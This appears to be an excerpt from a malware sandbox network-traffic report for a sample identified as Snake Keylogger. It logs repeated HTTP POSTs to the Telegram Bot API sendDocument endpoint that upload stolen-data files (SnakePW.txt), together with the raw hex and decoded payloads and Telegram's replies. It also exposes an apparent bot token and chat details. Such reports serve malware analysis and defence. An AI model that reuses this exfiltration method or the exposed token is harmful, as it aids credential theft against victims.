                            2022-06-26 07:33:30 UTC207INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66882,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228810,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            123192.168.2.549976149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:31 UTC207OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f40e254e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:31 UTC208OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 30 65 32 35 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f40e254eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:31 UTC208INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:31 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:31 UTC208INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66883,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228811,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            124192.168.2.549977149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:32 UTC209OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f444fb1e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:32 UTC209OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 34 34 66 62 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f444fb1eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:32 UTC210INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:32 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:32 UTC210INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66884,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228812,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            125192.168.2.549978149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:32 UTC211OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f480962d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:32 UTC211OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 38 30 39 36 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f480962dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:32 UTC211INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:32 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:32 UTC212INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66885,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228812,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            126192.168.2.549979149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:32 UTC212OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f4b76b89
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:32 UTC213OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 62 37 36 62 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f4b76b89Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:33 UTC213INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:33 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:33 UTC213INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66886,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228813,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            127192.168.2.549980149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:33 UTC214OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f4f30770
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:33 UTC214OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 66 33 30 37 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f4f30770Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:33 UTC215INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:33 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:33 UTC215INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66888,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228813,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            128192.168.2.549982149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:33 UTC216OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f529dd26
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:33 UTC216OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 32 39 64 64 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f529dd26Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:33 UTC216INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:33 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:33 UTC217INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66889,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228813,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            129192.168.2.549983149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:33 UTC217OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f5657896
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:33 UTC218OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 36 35 37 38 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f5657896Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:34 UTC218INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:34 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:34 UTC219INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66890,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228814,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
